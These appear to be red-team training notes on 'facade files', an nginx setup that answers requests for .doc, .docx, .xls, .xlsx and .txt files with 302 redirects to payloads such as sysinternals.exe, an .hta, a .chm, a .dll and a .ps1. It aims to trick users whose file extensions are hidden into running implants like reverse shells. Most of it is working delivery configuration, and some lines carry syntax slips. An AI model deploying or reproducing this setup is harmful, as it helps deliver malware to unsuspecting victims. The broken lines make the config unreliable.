FACADE FILES
these are files that serve as deceptive decoys. in most enterprise environments and employee machines, the file extensions are hidden! this setup of hiding file extensions gives the attacker's payload a better chance of getting triggered by the victims as the requested resource name is the same as the payload names.
#these extensions are chosen specifically because they are clickable which targets careless users
#as soon as these payloads are clicked, the implants within them gets triggered - e.g., reverse shell, etc
#this functionality is already a feature in PwnDrop
#connect to the ec2 nginx vps
root@oco:~$ sudo -i {key}.pem ubuntu@ec2.compute.amazonaws.com
#configure facade files server - simply add the below configuration to the conf file
root@oco:~$ cd /etc/nginx/conf.d
root@oco:~$ nano extension_spoof.conf
...
location / {
try_files $uri $uri/ = 404;
}
#this section serves the "sysinternals.exe" binary upon receiving a request to any ".doc" files and as long as the remote address criteria is met
#the return 302 is a redirection that states the resource has moved to a new location
#this return 302 redirect functionality is being abused to deliver an alternative file!
location ~ \.doc${
if($remote_addr ~ "74.235.35.184"){
return 302 /sysinternals.exe;
}
}
#this section serves the "Auto_Suite.hta" file upon receiving a request for any .docx files
location ~ \.docx${
return 302 /Auto_Suite.hta;
}
#this section serves the "MS_Helper.chm" file upon receiving a request for any .xls file
location ~ \.xls${
return 302 /MS_Helper.chm;
}
#this section serves the "Professional_Suite.dll" file upon receiving a request for any .xlsx file
location ~ \.xlsx${
return 302 /Professional_Suite.dll;
}
#this section serves the "AD_Suite.ps1" file upon receiving a request for any .txt file
location ~ \.txt${
return 302 /AD_Suite.ps1;
}#example trigger
root@NGVM: BROWSER > {nuclear.cyberwarfare.live}
* this should work and anyone visiting will see the legitimate nginx page
root@NGVM: BROWSER > {nuclear.cyberwarfare.live/arbitraryPage}
* this will show a 404 NOT FOUND error as nothing is configured
root@NGVM: BROWSER > {nuclear.cyberwarfare.live/resource.xls}
* although the file named "resource.xls" doesn't exist the server, the
server will perform a redirection as configured and will download whatever is the
alternate resource assigned to the .xls extension
* the traffic and requests can be viewed in dev tools via Network tab
- e.g., request for legit.xls is received, MS_Helper.chm response sent instead which is the malware payloadLast updated